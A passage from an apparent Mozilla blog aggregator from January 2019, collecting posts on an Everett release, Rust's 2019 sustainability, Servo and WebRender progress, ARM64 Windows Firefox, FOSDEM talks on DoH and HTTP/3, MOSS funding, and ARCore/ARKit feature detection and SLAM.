It also drops support for Python 2.7--Everett no longer supports Python 2.

Why you should take a look at Everett

At Mozilla, I'm using Everett for Antenna which is the edge collector for the crash ingestion pipeline for Mozilla products including Firefox and Fennec. It's been in production for a little under a year now and doing super. Using Everett makes it much easier to:

  1. deal with different configurations between local development and server environments
  2. test different configuration values
  3. document configuration options

It's also used in a few other places and I plan to use it for the rest of the components in the crash ingestion pipeline.

First-class docs. First-class configuration error help. First-class testing. This is why I created Everett.

If this sounds useful to you, take it for a spin. It's almost a drop-in replacement for python-decouple and os.environ.get('CONFIGVAR', 'default_value') style of configuration.

Enjoy!

Thank you!

Thank you to Paul Jimenez who helped fixing issues and provided thoughtful insight on API ergonomics!

Where to go for more

For more specifics on this release, see here: https://everett.readthedocs.io/en/latest/history.html#january-7th-2019

Documentation and quickstart here: https://everett.readthedocs.io/en/latest/

Source code and issue tracker here: https://github.com/willkg/everett

Niko MatsakisRust in 2019: Focus on sustainability

To me, 2018 felt like a big turning point for Rust, and it wasn’t just the edition. Suddenly, it has become “normal” for me to meet people using Rust at their jobs. Rust conferences are growing and starting to have large number of sponsors. Heck, I even met some professional Rust developers amongst the parents at a kid’s birthday party recently. Something has shifted, and I like it.

At the same time, I’ve also noticed a lot of exhaustion. I know I feel it – and a lot of people I talk to seem to feel the same way. It’s great that so much is going on in the Rust world, but we need to get better at scaling our processes up and processing it effectively.

When I think about a “theme” for 2019, the word that keeps coming to mind for me is sustainability. I think Rust has been moving at a breakneck pace since 1.0, and that’s been great: it’s what Rust needed. But as Rust gains more solid footing out there, it’s a good idea for us to start looking for how we can go back and tend to the structures we’ve built.

Sustainable processes

There has been a lot of great constructive criticism of our current processes: most recently, boat’s post on organizational debt, along with Florian’s series of posts, did a great job of crystallizing a lot of the challenges we face. I am pretty confident that we can adjust our processes here and make things a lot better, though obviously some of these problems have no easy solution.

Obviously, I don’t know exactly what we should do here. But I think I see some of the pieces of the puzzle. Here is a variety of bullet points that have been kicking around in my head.

Working groups. In general, I would like to see us adopting the idea of working groups as a core “organizational unit” for Rust, and in particular as the core place where work gets done. A working group is an ad-hoc set of people that includes both members of the relevant Rust team but also interested volunteers. Among other benefits, they can be a great vehicle for mentoring, since it gives people a particular area to focus on, versus trying to participate in the Rust project as a whole, which can be very overwhelming.

Explicit stages. Right now, Rust features go through a number of official and semi-official stages before they become “stable”. As I have argued before, I think we would benefit from making these stages a more explicit part of the process (much as e.g. the TC39 and WebAssembly groups already do).

Finishing what we start. Right now, we have no mechanism to expose the “capacity” of our teams – we tend to, for example, accept RFCs without any idea who will implement it, or even mentor an implementation. In fact, there isn’t really a defined set of people to try and ensure that it happens. The result is that a lot of things linger in limbo, either unimplemented, undocumented, or unstabilized. I think working groups can help to solve this, by having a core leadership team that is committed to seeing the feature through.

Expose capacity. Continuing the previous point, I think we should integrate a notion of capacity into the staging process: so that we avoid moving too far in the design until we have some idea who is going to be implementing (or mentoring an implementation). If that is hard to do, then it indicates we may not have the capacity to do this idea right now – if that seems unacceptable, then we need to find something else to stop doing.

Don’t fly solo. One of the things that we discussed in a recent compiler team steering meeting is that being the leader of a working group is super stressful – it’s a lot to manage! However, being a co-leader of a working group is very different. Having someone else (or multiple someones) that you can share work with, bounce ideas off of, and so forth makes all the difference. It’s also a great mentoring opportunities, as the leaders of working groups don’t necessarily have to be full members of the team (yet). Part of exposing capacity, then, is trying to ensure that we don’t just have one person doing any one thing – we have multiple. This is scary: we will get less done. But we will all be happier doing it.

Evaluate priorities regularly. In my ideal world, we would make it very easy to find out what each person on a team is working on, but we would also have regular points where we evaluate whether those are the right things. Are they advancing our roadmap goals? Did something else more promising arise in the meantime? Part of the goal here is to leave room for serendipity: maybe some random person came in from the blue with an interesting language idea that seems really cool. We want to ensure we aren’t too “locked in” to pursue that idea. Incidentally, this is another benefit to not “flying solo” – if there are multiple leaders, then we can shift some of them around without necessarily losing context.

Keeping everyone in sync. Finally, I think we need to think hard about how to help keep people in sync. The narrow focus of working groups is great, but it can be a liability. We need to develop regular points where we issue “public-facing” updates, to help keep people outside the working group abreast of the latest developments. I envision, for example, meetings where people give an update on what’s been happening, the key decision and/or controversies, and seek feedback on interesting points. We should probably tie these to the stages, so that ideas cannot progress forward unless they are also being communicated.

TL;DR. The points above aren’t really a coherent proposal yet, though there are pieces of proposals in them. Essentially I am calling for a bit more structure and process, so that it is clearer what we are doing now and it’s more obvious when we are making decisions about what we should do next. I am also calling for more redundancy. I think that both of these things will initially mean that we do fewer things, but we will do them more carefully, and with less stress. And ultimately I think they’ll pay off in the form of a larger Rust team, which means we’ll have more capacity.

Sustainable technology

So what about the technical side of things? I think the “sustainable” theme fits here, too. I’ve been working on rustc for 7 years now (wow), and in all of that time we’ve mostly been focused on “getting the next goal done”. This is not to say that nobody ever cleans things up; there have been some pretty epic refactoring PRs. But we’ve also accumulated a fair amount of technical debt. We’ve got plenty of examples where a new system was added to replace the old – but only 90%, meaning that now we have two systems in use. This makes it harder to learn how rustc works, and it makes us spend more time fixing bugs and ICEs.

I would like to see us put a lot of effort into making rustc more approachable and maintaineable. This means writing documentation, both of the rustdoc and rustc-guide variety. It also means finishing up things we started but never quite finished, like replacing the remaining uses of NodeId with the newer HirId. In some cases, it might mean rewriting whole subsystems, such as with the trait system and chalk.

None of this means we can’t get new toys. Cleaning up the trait system implementation, for example, makes things like Generic Associated Types (GATs) and specialization much easier. Finishing the transition into the on-demand query system should enable better incremental compilation as well as more complete parallel compilation (and better IDE support). And so forth.

Finally, it seems clear that we need to continue our focus on reducing compilation time. I think we have a lot of good avenues to pursue here, and frankly a lot of them are blocked on needing to improve the compiler’s internal structure.

Sustainable finances

When one talks about sustainability, that naturally brings to mind the question of financial sustainability as well. Mozilla has been the primary corporate sponsor of Rust for some time, but we’re starting to see more and more sponsorship from other companies, which is great. This comes in many forms: both Google and Buoyant have been sponsoring people to work on the async-await and Futures proposals, for example (and perhaps others I am unaware of); other companies have used contracting to help get work done that they need; and of course many companies have been sponsoring Rust conferences for years.

Going into 2019, I think we need to open up new avenues for supporting the Rust project financially. As a simple example, having more money to help with running CI could enable us to parallelize the bors queue more, which would help with reducing the time to land PRs, which in turn would help everything move faster (not to mention improving the experience of contributing to Rust).

I do think this is an area where we have to tread carefully. I’ve definitely heard horror stories of “foundations gone wrong”, for example, where decisions came to be dominated more by politics and money than technical criteria. There’s no reason to rush into things. We should take it a step at a time.

From a personal perspective, I would love to see more people paid to work part- or full-time on rustc. I’m not sure how best to make that happen, but I think it is definitely important. It has happened more than once that great rustc contributors wind up taking a job elsewhere that leaves them no time or energy to continue contributing. These losses can be pretty taxing on the project.

Reference material

I already mentioned that I think the compiler needs to put more emphasis on documentation as a means for better sustainability. I think the same also applies to the language: I’d like to see the lang team getting more involved with the Rust Reference and really trying to fill in the gaps. I’d also like to see the Unsafe Code Guidelines work continue. I think it’s quite likely that these should be roadmap items in their own right.

The Servo BlogThis Week In Servo 122

In the past three weeks, we merged 130 PRs in the Servo organization’s repositories.

Congratulations to Ygg01 for their new reviewer status for the html5ever repository!

Planning and Status

Our roadmap is available online. Plans for 2019 will be published soon.

This week’s status updates are here.

Exciting works in progress

  • mandreyel is adding support for parallel CSS parsing.
  • cbrewster is adding profiling support for WebGL APIs.
  • jdm is synchronizing WebGL rendering with WebRender’s GL requirements.

Notable Additions

  • gterzian replaced some synchronous communication with the embedder.
  • eijebong implemented support for the once argument for addEventListener.
  • Darkspirit slimmed down the list of supported TLS ciphers.
  • jdm fixed a web incompatibility preventing the DuckDuckGo search from loading.
  • oOIgnitionOo made it easier to run historical nightlies from the command line.
  • jdm fixed a bug preventing iframes from being sized correctly initially.
  • cdeler enabled the WebBluetooth tests from upstream.
  • paulrouget split the simpleservo embedding crate into crates for Rust, Java, and C.
  • georgeroman added support for the playbackRate media API.
  • denixmerigoux avoided an assertion failure in the text editing implementation.
  • SimonSapin converted the first macOS CI builder to run in Taskcluster.
  • emilio consolidated the style thread pools into a single per-process threadpool.
  • asajeffrey implemented keyboard support for Magic Leap devices.
  • ferjm implemented backoff support for media playaback.
  • Manishearth implemented support for WebXR controller input.
  • cybai ensured that constructing URLs removes question mark characters appropriately.
  • Manishearth made safe Rc<Promise> values not be reported as unrooted by the rooting static analysis.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Karl Dubost01 - They fixed it

This is a new chapter. I'll try to move forward in a semi-regular basis. The work done by the awesome core engineers of Mozilla is essential. Some of the things they fix or explain have direct impact on the web compatibility work. A couple of years ago at Mozilla Hands. I gave a lightning talk called "They fixed it". I quickly put forward to the audience all the (webcompat) cool bugs which had been fixed by Core engineers.

  • The site Channel NewsAsia is using a transform with a rotation for their headers when scrolling the content. The headers had a wider gap in Firefox than Chrome. An issue was reported. Brian Birtles digged into the isssue. He explained in details why the interpolation looks worse in Firefox than Chrome. Firefox has implemented the new specification. Web developers rely on an old version of the algorithm in Chrome. Chrome will change soon(?) and it will be equally broken. That was quite cool, Brian. Thanks!
  • I will probably write often about the Virtual Viewport and associated issues. Basically to make it short, Chrome/Safari have the notion of a virtual viewport in addition to the device viewport. This creates a series of different behavior for websites on Chrome vs Firefox on Android. We had a lot of webcompat issues about it. So as I said I will talk more about it in the future. In the mean time big big shout out to Hiroyuki Ikezoe and Botond Ballo
  • Orthogonal to the Virtual viewport I just mentionned, there's work to expose the Visual Viewport API. Jan Henning just before christmas 2018 fixed Implement event handlers of the Visual Viewport API. This is part of the Visual Viewport interface. Thanks.

Mark SurmanRaising my sights in 2019

As I sit here quietly in the dawn of 2019, I feel deep gratitude for the year that has just passed — and tremendous hope for the year ahead. My hope is for a year where I raise my sights, to notice things more and see what can blossom from seeds I have sown over the past few years.

At the beginning of last year, I set the intention to ‘stay the course’ on big changes that I had made in both my personal life and at Mozilla. This has paid off. I have a house of my own that I have slowly, and with the help of others, turned into a home. I have a renewed sense of family and community, including a much richer relationship with my boys. And, I have energy, hope and gratitude for Mozilla and the people I work with that is stronger than it has been in years. Being present and staying the course on a good set of choices, made these things possible.

Looking ahead, it would be easy to say ‘I should just stay the course on staying the course’. In some ways, that is what I will do. Yet, I also want to look at things from a slightly different angle as I proceed.

My intention for 2019 is to ‘raise my sights’ — to look out further as I walk. In doing so, I hope to observe things I otherwise couldn’t see. And, to respond to these observations in a way that will slowly, subtly elevate and unlock more joy and love and impact. My intention is to go slow, look ahead and act boldly as I continue along the path I have carved over the past few years.

Oddly, I landed on this intention in part by reading about wine. In particular, I came across a term that I had never heard before: élevage, the care and work put in after fermentation to bring out quality and make a wine ready to drink. This may sound like a corny or even pretentious source for a yearly intention — but I found a great deal in the idea of élevage as I reflected on it.

Growing and crushing grapes is what most often comes to mind when we think of ‘making great wine’. Of course, this process of creative destruction is at the core of wine making. A great deal of energy is applied, intensely and with intention. That intensity and intention have a huge impact on what the wine becomes. In that way, it is much like starting a new project or making big changes in your life.

There is another part of winemaking that is almost as impactful, yet often under appreciated. This is the process of élevage: looking after that wine after you have ‘made’ it and before you lock it into a bottle for ageing and drinking. It is in the process of listening to the wine as it begins to take shape, raising it up and helping it mature in slow and subtle ways. Deciding on wood or steel or clay. Topping up the barrel. Or, not. Blending. This phase is critical in shaping what the wine does or doesn’t become — and yet it can only happen in its own time, in a very slow dance of listening and acting and listening again. This is a dance that we often forget when making changes to our lives and our organizations.

It was with this reflection that I landed on the idea of ‘raising my sights’ — and elevating what is possible — as my intention for 2019. I have put a great deal of energy and intention into the last few years, and I am seeing the results in my home life, my personal life and my work life. It has been a period of creative destruction. In so many ways, I am happy with what has been created. Yet, there is still much more to strive for and explore and enjoy on this path.

Now feels like the time to at once look up and slow down. Whether in small or big ways, I am hopeful that there are great things on the path ahead. The trick will be to notice and embrace and nurture them as they appear.

The post Raising my sights in 2019 appeared first on Mark Surman.

Nathan Froydarm64 windows update #1

A month ago, we formally announced that we were working to bring Firefox to ARM64 Windows.  The last month has seen significant progress on our journey to that release.

The biggest news is that we have dogfoodable (auto-updating) Nightly builds available!  As that message states, these Nightlies are even nightlier than our normal Nightlies, as they have not gone through our normal testing processes. But Firefox is perfectly usable on ARM64 Windows in its present state, so if you have an ARM64 device, please give it a try and file any bugs you find!

Since that announcement, native stack unwinding has been implemented.  That in turn means the Gecko Profiler can now capture native (C++/Rust) stack frames, which is an important step towards making the Gecko Profiler functional.  We also enabled WebRTC support, even though WebRTC video not working on ARM64 Windows is a known issue.

We’re currently working on porting our top-tier JavaScript JIT (IonMonkey) to ARM64.  We’re also working on enabling the crashreporter, which is a pretty important feature for getting bug reports from the field!  From my low-level tools perspective, the most interesting bug discovered via dogfooding is a WebRender crash caused by obscure ARM64-specific parameter passing issues in Rust itself.

Ideally, I’ll be writing updates every two weeks or so.  If you see something I missed, or want to point out something that should be in the next update, please email me or come find me on IRC.

Daniel StenbergMy talks at FOSDEM 2019

I’ll be celebrating my 10th FOSDEM when I travel down to Brussels again in early February 2019. That’s ten years in a row. It’ll also be the 6th year I present something there, as I’ve done these seven talks in the past:

My past FOSDEM appearances

2010. I talked Rockbox in the embedded room.

2011. libcurl, seven SSL libs and one SSH lib in the security room.

2015. Internet all the things – using curl in your device. In the embedded room.

2015. HTTP/2 right now. In the Mozilla room.

2016. an HTTP/2 update. In the Mozilla room.

2017. curl. On the main track.

2017. So that was HTTP/2, what’s next? In the Mozilla room.

DNS over HTTPS – the good, the bad and the ugly

On the main track, in Janson at 15:00 on Saturday 2nd of February.

DNS over HTTPS (aka “DoH”, RFC 8484) introduces a new transport protocol to do secure and private DNS messaging. Why was it made, how does it work and how users are free (to resolve names).

The presentation will discuss reasons why DoH was deemed necessary and interesting to ship and deploy and how it compares to alternative technologies that offer similar properties. It will discuss how this protocol “liberates” users and offers stronger privacy (than the typical status quo).

How to enable and start using DoH today.

It will also discuss some downsides with DoH and what you should consider before you decide to use a random DoH server on the Internet.

HTTP/3

In the Mozilla room, at 11:30 on Saturday 2nd of February.

HTTP/3 is the next coming HTTP version.

This time TCP is replaced by the new transport protocol QUIC and things are different yet again! This is a presentation about HTTP/3 and QUIC with a following Q&A about everything HTTP. Join us at Goto 10.

HTTP/3 is the designated name for the coming next version of the protocol that is currently under development within the QUIC working group in the IETF.

HTTP/3 is designed to improve in areas where HTTP/2 still has some shortcomings, primarily by changing the transport layer. HTTP/3 is the first major protocol to step away from TCP and instead it uses QUIC. I’ll talk about HTTP/3 and QUIC. Why the new protocols are deemed necessary, how they work, how they change how things are sent over the network and what some of the coming deployment challenges will be.

DNS Privacy panel

In the DNS room, at 11:55 on Sunday 3rd of February.

This isn’t strictly a prepared talk or presentation but I’ll still be there and participate in the panel discussion on DNS privacy. I hope to get most of my finer points expressed in the DoH talk mentioned above, but I’m fully prepared to elaborate on some of them in this session.

The Mozilla BlogMOSS 2018 Year in Review

Mozilla was born out of, and remains a part of, the open-source and free software movement. Through the Mozilla Open Source Support (MOSS) program, we recognize, celebrate, and support open source projects that contribute to our work and to the health of the internet.

2018 was a year of change and growth for the MOSS program. We worked to streamline the application process, undertook efforts to increase the diversity and inclusion of the program, and processed a record number of MOSS applications. The results? In total, MOSS provided over $970,000 in funding to over 40 open-source projects over the course of 2018. For the first time since the beginning of the program, we also received the majority of our applications from outside of the United States.

2018 highlights

While all MOSS projects advance the values of the Mozilla Manifesto, we’ve selected a few that stood out to us this year:

    • Secure Drop — $250,000 USD
      • SecureDrop is an open-source whistleblower submission system that media organizations can install to securely accept documents from anonymous sources. It was originally built by the late Aaron Swartz and is used by newsrooms all over the world, including those at The Guardian and the Associated Press. In 2018, MOSS gave its second award to Secure Drop; to date, the MOSS program has supported Secure Drop with $500,000 USD in funding.
    • The Tor Project — $150,000 USD
      • Tor is free software and an open network that helps defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. In 2018, MOSS gave its second award to help modularize key aspects of the Tor codebase; to date, the MOSS program has supported this work with $300,000 USD in funding.
    • The Processing Foundation — $69,700 USD
      • The Processing Foundation maintains p5.js, an open-source JavaScript framework that makes creating visual media with code on the web accessible to anyone, especially those without traditional computer science backgrounds. p5.js enables users to quickly prototype interactive applications, data visualizations, and narrative experiences, and share them easily on the web.
    • Dat Project — $34,000 USD
      • Dat is a nonprofit-backed data sharing protocol for applications of the future. With software built for researchers and data management, Dat empowers people with decentralized data tools. MOSS provided $34,000 USD in funding to Dat for community-building, documentation, and tooling.

Seed Awards

With an eye toward broadening participation in the MOSS program and reaching new audiences, the MOSS team decided to try something new at this year’s Mozilla Festival in London: we invited Festival attendees who work on open-source projects to join us for an event we called “MOSS Speed Dating.” For the event, we established a special MOSS committee, comprised of existing committee members, Mozilla staff, and leaders in the open-source world. Attendees were invited to “pitch” their project to three different committee members for 10 minutes each. Following the event, the committee met to discuss which projects best exemplified the qualities we look for in all MOSS projects (openness, impact, alignment with the Mozilla mission) and provided each of the most promising projects with a $5,000 seed grant to help support future development. While many of these projects are less mature than the projects we’d support with a larger, traditional MOSS award, we hope that these seed awards will assist them in growing their codebases and communities.

The 14 projects that the committee selected were:

Looking forward to 2019

In 2019, we hope to double down on our efforts to widen the applicant pool for MOSS and support a record number of projects from a diverse set of maintainers around the globe. Do you know of an open-source project in need of support whose work advances Mozilla’s mission? Please encourage them to apply for a MOSS award!

The post MOSS 2018 Year in Review appeared first on The Mozilla Blog.

Will Kahn-GreeneSocorro in 2018

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the crash reporter collects data about the crash, generates a crash report, and submits that report to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

2018 was a big year for Socorro. In this blog post, I opine about our accomplishments.

Read more… (15 mins to read)

Mozilla GFXWebRender newsletter #34

Happy new year! I’ll introduce WebRender’s 34th newsletter with a rather technical overview of a neat trick we call primitive segmentation. In previous posts I wrote about how we deal with batching and how we use the depth buffer both as a culling mechanism and as a way to save memory bandwidth. As a result, pixels rendered in the opaque pass are much cheaper than pixels rendered in the blend pass. This works great with rectangular opaque primitives that are axis-aligned so they don’t need anti-aliasing. Anti-aliasing, however, requires us to do some blending to smoothen the edges and rounded corners have some transparent pixels. We could tessellate a mesh that covers exactly the rounded primitive but we’d still need blending for the anti-aliasing of the border. What a shame, rounded corners are so common on the web, and they are often quite big.

Well, we don’t really need to render whole primitives at a time. for a transformed primitive we can always extract out the opaque part of the primitive and render the anti-aliased edges separately. Likewise, we can break rounded rectangles up into smaller opaque rectangles and the rectangles that contain the corners. We call this primitive segmentation and it helps at several levels: opaque segments can move to the opaque pass which means we get good memory bandwidth savings and better batching since batching complexity is mostly affected by the amount of work to perform during the blend pass. This also opens the door to interesting optimizations. For example we can break a primitive into segments, not only depending on the shapes of the primitive itself, but also on the shape of masks that are applied to it. This lets us create large rounded rectangle masks where only the rounded parts of the masks occupy significant amounts of space in the mask. More generally, there are a lot of complicated elements that can be reduced to simpler or more compact segments by applying the same family of tricks and render them as nine-patches or some more elaborate patchwork of segments (for example the box-shadow of a rectangle).

Segmented primitives

The way we represent this on the GPU is to pack all of the primitive descriptions in a large float texture. For each primitive we first pack the per-primitive data followed by the per-segment data. We dispatch instanced draw calls where each instance corresponds to a segment’s quad. The vertex shader finds all of the information it needs from the primitive offset and segment id of the quad it is working on.

The idea of breaking complicated primitives up into simpler segments isn’t new nor ground breaking, but I think that it is worth mentioning in the context of WebRender because of how well it integrates with the rest of our rendering architecture.

Notable WebRender and Gecko changes

  • Jeff fixed some issues with blob image recoordination.
  • Dan improved the primitive interning mechanism in WebRender.
  • Kats fixed a bug with position:sticky.
  • Kats fixed a memory leak.
  • Kats improved the CI.
  • Kvark fixed a crash caused by empty regions in the texture cache allocator.
  • Kvark fixed a division by zero in a shader.
  • Matt improved to the frame scheduling logic.
  • Matt fixed a hit-testing issue with opacity:0 divs.
  • Matt fixed a blob image validation issue.
  • Matt improved the performance of text DrawTargets.
  • Matt prevented opacity:0 animation from generating lots of CPU work.
  • Matt fixed a pixel snapping issue.
  • Matt reduced the number of YUV shader permutations.
  • Lee fixed a bug in the FreeType font backend that caused all sub-pixel AA text to be shifted by a pixel.
  • Lee implemented font variation on Linux.
  • Emilio fixed a clipping issue allowing web content to draw over the tab bar.
  • Emilio fixed a border rendering corruption.
  • Glenn added suport for picture caching when the content rect changes between display lists.
  • Glenn fixed some picture caching bugs (2, 3, 4, 5).
  • Glenn removed redundant clustering information.
  • Glenn fixed a clipping bug.
  • Sotaro and Bobby lazily iniztialized D3D devices.
  • Sotaro fixed a crash on Wayland.
  • Bobby improved memory usage.
  • Bobby improved some of the debugging facilities.
  • Bobby shrunk the size of some handles using NonZero.
  • Bobby improved the shader hashing speed to help startup.
  • Glenn fixed a picture caching bug with multiple scroll roots.
  • Glenn improved the performance of picture caching.
  • Glenn followed up with more picture caching improvements.

Ongoing work

The team is going through the remaining release blockers.

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.

Note that it is possible to log in with a github account.

RabimbaARCore and Arkit: What is under the hood : Anchors and World Mapping (Part 1)

Reading Time: 7 MIn
Some of you know I have been recently experimenting a bit more with WebXR than a WebVR and when we talk about mobile Mixed Reality, ARkit and ARCore is something which plays a pivotal role to map and understand the environment inside our applications.

I am planning to write a series of blog posts on how you can start developing WebXR applications now and play with them starting with the basics and then going on to using different features of it. But before that, I planned to pen down this series of how actually the "world mapping" works in arcore and arkit. So that we have a better understanding of the Mixed Reality capabilities of the devices we will be working with.

Mapping: feature detection and anchors

Creating apps that work seamlessly with arcore/kit requires a little bit of knowledge about the algorithms that work in the back and that involves knowing about Anchors.

What are anchors:

Anchors are your virtual markers in the real world. As a developer, you anchor any virtual object to the real world and that 3d model will stay glued into the physical location of the real world. Anchors also get updated over time depending on the new information that the system learns. For example, if you anchor a pikcahu 2 ft away from you and then you actually walk towards your pikachu, it realises the actual distance is 2.1ft, then it will compensate that. In real life we have a static coordinate system where every object has it's own x,y,z coordinates. Anchors in devices like HoloLens override the rotation and position of the transform component.

How Anchors stick?

If we follow the documentation in Google ARCore then we see it is attached to something called "trackables", which are feature points and planes in an image. Planes are essentially clustered feature points. You can have a more in-depth look at what Google says ARCore anchor does by reading their really nice Fundamentals. But for our purposes, we first need to understand what exactly are these Feature Points.

Feature Points: through the eyes of computer vision

Feature points are distinctive markers on an image that an algorithm can use to track specific things in that image. Normally any distinctive pattern, such as T-junctions, corners are a good candidate. They lone are not too useful to distinguish between each other and reliable place marker on an image so the neighbouring pixels of that image are also analyzed and saved as a descriptor.
Now a good anchor should have reliable feature points attached to it. The algorithm must be able to find the same physical space under different viewpoints. It should be able to accommodate the change in 
  • Camera Perspective
  • Rotation
  • Scale
  • Lightning
  • Motion blur and noise
Reliable Feature Points
This is an open research problem with multiple solutions on board. Each with their own set of problems though. One of the most popular algorithms stem from this paper by David G. Lowe at IJCV is called Scale Invariant Feature Transform (SIFT). Another follow up work which claims to have even better speed was published in ECCV in 2006 called Speeded Up Robust Features (SURF) by Bay et al. Thought both of them are patented at this point. 

Microsoft Hololens doesn't really need to do all this heavy lifting since it can rely on an extensive amount of sensor data. Especially it gets aid from the depth sensor data from its Infrared Sensors. However, ARCore and ARkit doesn't enjoy those privileges and has to work with 2d images. Though we cannot say for sure which of the algorithm is actually used for ARKit or ARCore we can try to replicate the procecss with a patent-free algorithm to understand how the process actually works.

D.I.Y Feature Detection and keypoint descriptors

To understand the process we will use an algorithm by Leutenegger et al called BRISK. To detect feature we must follow a multi-step process. A typical algorithm would adhere to the following two steps
  1. Keypoint Detection: Detecting keypoint can be as simple as just detecting corners. Which essentially evaluates the contrast between neighbouring pixels. A common way to do that in a large-scale image is to blur the image to smooth out pixel contrast variation and then do edge detection on it. The rationale for this is that you would normally want to detect a tree and a house as a whole to achieve reliable tracking instead of every single twig or window. SIFT and SURF adhere to this approach. However, for real-time scenario blurring adds a compute penalty which we don't want. In their paper "Machine Learning for High-Speed Corner Detection" Rosten and Drummond proposed a method called FAST which analyzes the circular surrounding if each pixel p. If the neighbouring pixels brightness is lower/higher than  and a certain number of connected pixels fall into this category then the algorithm found a corner. 
    Image credits: Rosten E., Drummond T. (2006) Machine Learning for High-Speed Corner Detection.. Computer Vision – ECCV 2006. 
    Now back to BRISK, for it out of the 16-pixel circle, 9 consecutive pixels must be brighter or darker than the central one. Also BRISk uses down-sized images allowing it to achieve better invariance to scale.
  2. Keypoint Descriptor: The primary property of the detected keypoints should be that they are unique. The algorithm should be able to find the feature in a different image with a different viewpoint, lightning. BRISK concatenates the brightness comparison results between different pixels surrounding the centre keypoint and concatenates them to a 512 bit string.
    Image credits: S. Leutenegger, M. Chli and R. Y. Siegwart, “BRISK: Binary Robust invariant scalable keypoints”, 2011 International Conference on Computer Vision
    As we can see from the sample figure, the blue dots create the concentric circles and the red circles indicate the individually sampled areas. Based on these, the results of the brightness comparison are determined. BRISK also ensures rotational invariance. This is calculated by the largest gradients between two samples with a long distance from each other.

Test out the code

To test out the algorithms we will use the reference implementations available in OpenCV. We can use a pip install to install it with python bindings

As test image, I used two test images I had previously captured in my talks at All Things Open and TechSpeaker meetup. One is an evening shot of Louvre, which should have enough corners as well as overlapping edges, and another a picture of my friend in a beer garden in portrait mode. To see how it fares against the already existing blur on the image.

Original Image Link

Original Image Link
Visualizing the Feature Points
We use the below small code snippet to use BRISK on the two images above to visualize the feature points


What the code does:
  1. Loads the jpeg into the variable and converts into grayscale
  2. Initialize BRISK and run it. We use the paper suggested 4 octaves and an increased threshold of 70. This ensures we get a low number but highly reliable key points. As we will see below we still got a lot of key points
  3. We used the detectAndCompute() to get two arrays from the algo holding both the keypoints and their descriptors
  4. We draw the keypoints at their detected positions indicating keypoint size and orientation through circle diameter and angle, The "DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS" does that.


As you can see most of the key points are visible at the castle edges and all visible edges for Louvre and almost none on the floor. With the portrait mode pic of my friend it's more diverse but also shows some false positives like the reflection on the glass. Considering how BRISK works, this is normal.

Conclusion

In this first part of understanding what power ARCore/Kit we understood how basic feature detection works behind the scenes and tried our hands on to replicate that. These spatial anchors are vital to the virtual objects "glueing" to the real world. This whole demo and hands-on now should help you understand why designing your apps so that users place objects in areas where the device has a chance to create anchors is a good idea.
Placing a lot of objects in a single non-textured smooth plane may produce inconsistent experience since its just too hard to detect keypoints in a plane surface (now you know why). As a result, the objects may sometimes drift away if tracking is not good enough.
If your app design encourages placing objects near corners of floor or table then the app has a much better chance of working reliably. Also, Google's guide on anchor placement is an excellent read.

Their short recommendation is:
  • Release spatial anchors if you don’t need them. Each anchor costs CPU cycles which you can save
  • Keep the object close to the anchor. 
On our next post, we will see how we can use this knowledge to do basic SLAM.

Update: The next post lives here: https://blog.rabimba.com/2018/10/arcore-and-arkit-SLAM.html
Citation: https://www.andreasjakl.com/basics-of-ar-anchors-keypoints-feature-detection/

RabimbaARCore and Arkit, What is under the hood: SLAM (Part 2)

In our last blog post (part 1), we took a look at how algorithms detect keypoints in camera images. These form the basis of our world tracking and environment recognition. But for Mixed Reality, that alone is not enough. We have to be able to calculate the 3d position in the real world. It is often calculated by the spatial distance between itself and multiple keypoints. This is often called Simultaneous Localization and Mapping (SLAM). And this is what is responsible for all the world tracking we see in ARCore/ARKit.

What we will cover today:

  • How ARCore and ARKit does it's SLAM/Visual Inertia Odometry
  • Can we D.I.Y our own SLAM with reasonable accuracy to understand the process better

Sensing the world: as a computer

When we start any augmented reality application in mobile or elsewhere, the first thing it tries to do is to detect a plane. When you first start any MR app in ARKit, ARCore, the system doesn't know anything about the surroundings. It starts processing data from camera and pairs it up with other sensors.
Once it has those data it tries to do the following two things
  1. Build a point cloud mesh of the environment by building a map
  2. Assign a relative position of the device within that perceived environment
From our previous article, we know it's not always easy to build this map from unique feature points and maintain that. However, that becomes easy in certain scenarios if you have the freedom to place beacons at different known locations. Something we did at Mozfest 2016 when Mozilla still had the Magnets project which we had utilized as our beacons. A similar approach is used in a few museums for providing turn by turn navigation to point of interests as their indoor navigation system. However Augmented Reality systems don't have this luxury.

A little saga about relationships

We will start with a map.....about relationships. Or rather "A Stochastic Map For Uncertain Spatial Relationships" by Smith et al. 
In the real world, you have precise and correct information about the exact location of every object. However in AR world that is not the case. For understanding the case lets assume we are in an empty room and our mobile has detected a reliable unique anchor (A) (or that can be a stationary beacon) and our position is at (B). 
In a perfect situation, we know the distance between A and B, and if we want to move towards C we can infer exactly how we need to move.

Unfortunately, in the world of AR and SLAM we need to work with imprecise knowledge about the position of A and C. This results in uncertainties and the need to continually correct the locations. 

The points have a relative spatial relationship with each other and that allows us to get a probability distribution of every possible position. Some of the common methods to deal with the uncertainty and correct positioning errors are Kalman Filter (this is what we used in Mozfest), Maximum Posteriori Estimation or Bundle Adjustment. 
Since these estimations are not perfect, every new sensor update also has to update the estimation model.

Aligning the Virtual World

To map our surroundings reliably in Augmented Reality, we need to continually update our measurement data. The assumptions are, every sensory input we get contains some inaccuracies. We can take help from Milios et al in their paper "Globally Consistent Range Scan Alignment for Environment Mapping" to understand the issue. 
Image credits: Lu, F., & Milios, E. (1997). Globally consistent range scan alignment for environment mapping
Here in figure a, we see how going from position P1....Pn accumulates little measurement errors over time until the resulting environment map is wrong. But when we align the scan sin fig b, the result is considerably improved. To do that, the algorithm keeps track of all local frame data and network spatial relations among those.
A common problem at this point is how much data to store to keep doing the above correctly. Often to reduce complexity level the algorithm reduces the keyframes it stores.

Let's build the map a.k.a SLAM

To make Mixed Reality feasible, SLAM has the following challenges to handle
  1. Monocular Camera input
  2. Real-time
  3. Drift

Skeleton of SLAM

How do we deal with these in a Mixed Reality scene?
